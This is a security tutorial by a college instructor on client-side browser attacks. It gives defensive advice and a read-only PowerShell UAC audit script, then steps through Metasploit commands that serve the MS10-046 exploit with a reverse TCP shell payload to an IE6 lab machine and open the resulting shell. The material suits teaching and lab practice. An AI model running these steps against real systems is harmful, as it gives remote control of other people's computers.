Client Side Exploits using Metasploit

Overview

Client-side exploits are an extremely common form of attack. In a typical scenario, an attacker compromises an ecommerce website and then uses that website as a proxy to launch attacks on unsuspecting website visitors. How many of us have received viruses from a malicious webpage or website? More often than not, the owner of the website does not know that the website contains malicious code that is attacking its visitors. In these scenarios the target of the exploit is the user’s web browser.

The role of the web browser has expanded with the role of the web. Web browsers today are required to do much more than present static text and images: they process ecommerce transactions, interact with databases, launch media players, and transfer files. Yet the web and the web browser were not designed with security in mind. This makes the web browser an opportune target for attacks.

Client-side Defense

So how do you protect yourself and your browser from a client-side attack? Here is a list of best practices to protect against client side attacks:

  • Update and run an antivirus program and an antispyware program.
  • Update your operating system and web browsers on a regular basis.
  • Update media players (e.g. Flash, QuickTime), readers (e.g. Acrobat), and add-ons regularly.
  • Update Java.
  • Do not visit nefarious websites (e.g. sites that deal with pirated music and warez).
  • Do not surf the web as an administrator: make sure User Account Control (UAC) is enabled in Vista or Windows 7. Windows XP users can use the program Drop My Rights to achieve the same result.
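
As an added example (not part of the original article), this read-only PowerShell script checks the last item in the list on Windows Vista or later: whether UAC is enabled and whether the current session is already elevated. EnableLUA and ConsentPromptBehaviorAdmin are the standard UAC policy registry values; the message wording is this example's own.

```powershell
# Added example: audit the "do not surf the web as an administrator" advice.
# Read-only: it queries the registry and the current token and changes nothing.

$policyKey = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
$policy = Get-ItemProperty -Path $policyKey -ErrorAction SilentlyContinue

# EnableLUA = 1 means UAC is on. With 0, an administrator's processes
# (including the browser) always run with the full administrator token.
$uacEnabled = ($null -ne $policy) -and ($policy.EnableLUA -eq 1)

# ConsentPromptBehaviorAdmin = 0 means administrators are elevated silently,
# so nothing on screen warns the user when a process asks for elevation.
$silentElevation = ($null -ne $policy) -and ($policy.ConsentPromptBehaviorAdmin -eq 0)

# With UAC on, an administrator's normal session holds a filtered token and
# IsInRole(Administrator) is false until the process is explicitly elevated.
$identity  = [Security.Principal.WindowsIdentity]::GetCurrent()
$principal = New-Object Security.Principal.WindowsPrincipal($identity)
$adminRole = [Security.Principal.WindowsBuiltInRole]::Administrator
$elevated  = $principal.IsInRole($adminRole)

$findings = @()
if (-not $uacEnabled) {
    $findings += 'UAC is disabled (EnableLUA is not 1).'
}
if ($silentElevation) {
    $findings += 'Administrators elevate without a prompt (ConsentPromptBehaviorAdmin = 0).'
}
if ($elevated) {
    $findings += "Session for $($identity.Name) holds a full administrator token; a browser started here inherits it."
}

if ($findings.Count -eq 0) {
    Write-Output 'OK: UAC is enabled and this session is not elevated.'
} else {
    $findings | ForEach-Object { Write-Output "WARN: $_" }
}
```

Run it from the same session the browser is normally started from, since the elevation check reflects the token of the calling process.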

Client-side Attack

In the video tutorial below, a client-side exploit is tested against a lab computer running Windows XP Pro and Internet Explorer 6. In order to facilitate the attack, I use Metasploit to launch a webserver and serve a malicious webpage to the visiting IE6 web browser.

Demo steps:

Launch msfconsole, load the exploit and payload, set the options, and launch the exploiting webserver and webpage. See the following commands:
1. #msfconsole
2. msf > search browser
3. msf > use windows/browser/ms10_046_shortcut_icon_dllloader
4. msf > show payloads
5. msf > set payload generic/shell_reverse_tcp
6. msf > show options
7. msf > set lhost  <your ip address>
8. msf > set srvhost <your ip address>
9. msf > set srvport 80
10. msf > exploit
11. On your test client (victim computer), browse to your Metasploit server’s IP address using Internet Explorer to launch the client-side attack.
12. Once the exploit has finished launching, list your sessions:
     msf > sessions -l
13. msf > sessions -i 1
14. You should now have a Windows shell to interact with.

Video Tutorial

 


Author: Dan

Dan teaches computer networking and security classes at Central Oregon Community College.
